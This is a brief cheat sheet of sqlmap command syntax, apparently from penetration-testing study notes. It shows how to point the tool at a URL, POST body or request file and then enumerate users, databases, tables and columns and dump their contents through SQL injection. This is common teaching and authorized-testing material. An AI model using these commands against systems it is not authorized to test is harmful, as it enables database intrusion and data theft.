2.4.6 SQLMap
SQLMap
Basic Syntax
$ sqlmap -u "http://victim.site/view.php?id=1141" -p id --technique=U$ sqlmap -u <URL> --data=<POST string> -p parameter [options]$ sqlmap -r <request file> -p parameter [options]
Extracting Information
$ sqlmap -u <target> --banner <other options>$ sqlmap -u <target> --users <other options>$ sqlmap -u <target> --is-dba <other options>
$ sqlmap -u <target> --dbs <other options>$ sqlmap -u <target> -D <database> --tables <other options>$ sqlmap -u <target> -D <database> -T <tables, comma separated list> --columns <other options>$ sqlmap -u <target> -D <database> -T <tables> -C <columns list> --dump <other options>